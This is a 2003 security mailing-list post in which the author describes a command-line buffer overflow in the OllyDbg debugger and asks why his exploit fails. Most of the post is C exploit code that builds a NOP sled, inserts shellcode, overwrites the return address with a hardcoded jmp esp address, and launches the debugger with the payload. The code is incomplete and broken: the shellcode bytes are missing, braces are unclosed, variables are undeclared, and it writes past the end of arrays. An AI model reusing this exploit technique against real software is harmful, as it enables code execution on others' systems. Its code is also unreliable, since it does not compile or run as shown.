win32 command line overflows: (ex: ollydbg.exe)

From: wirepair (wirepairat_private)
Date: Thu Jun 05 2003 - 05:24:45 PDT

  • Next message: Olivier DEMBOUR: "Re: win32 shellcoding"

    Hello all, Just messing around with win32 overflows, and 
    i've run into a small problem with command line overflows. 
    Ollydbg has a buffer overflow when you call a program with 
    a large command line. (I found this when trying to debug 
    rasphone.exe in WinXP (rasphone -f <1000'a>) I was 
    expecting Ollydbg to run the program but it crashed itself 
    "Error in Instruction 0x41414141 while trying to 'read' 
    0x41414141. So I tried to write an exploit for Ollydbg. 
    Issue #2 Visual C++ crashes as well when i'm trying to 
    debug ollydbg so I have to do this blindly. My exploit 
    buffer looks like:
    ollydbg.exe ollydbg.exe <200 NOPS>Shellcode<more 
    I'm trying to use CreateProcess to call ollydbg.exe but it 
    doesn't do anything, no crash no nothing. So i saved the 
    exploit buffer to a file and tried to 'paste' it (heh). It 
    doesn't crash even though there are over 600 characters... 
    (Ollydbg.exe overwrites EIP at 508-511, i think i can't 
    debug it!)
    Anyways here's my code any insite on why this isn't 
    working is greatly appreciated:
    #include <windows.h>
    #include <stdio.h>
    #include <string.h>
    int main(int argc, char **argv) {
    	char exp_buff[1024];
    	int x,i;
    	char ollyfile[100];
         DWORD jmpesp = 0x77E9AE59; // jmp esp call in 
    	unsigned char shellcode[19] = 
    //tiny sc
    	if (argc != 2) {
    		fprintf(stderr, "heh: %s <path to olly>\n", argv[0]);
    	strncpy(ollyfile, argv[1], 99);
    	ollyfile[100] = 0x00;
    	x = strlen(ollyfile);
    	memset(exp_buff, 0x90, 1024); 
    	memcpy(exp_buff, ollyfile, x);
    	exp_buff[x] = ' ';
    	memcpy(exp_buff+200, &shellcode, 19);
    	exp_buff[218] = 0x90;
    	for (i = 219; i <= 508; i++) {
    		exp_buff[i] = 0x90;
    	exp_buff[1024] = 0x00;
    	memcpy(exp_buff+508, &jmpesp, 4);
    	fprintf(stderr, "%s", exp_buff); //debugging heh
    	CreateProcess("E:\\ollydbg\\ollydbg.exe", exp_buff, NULL, 
    NULL, FALSE, 0, NULL, NULL, &si, &pi);
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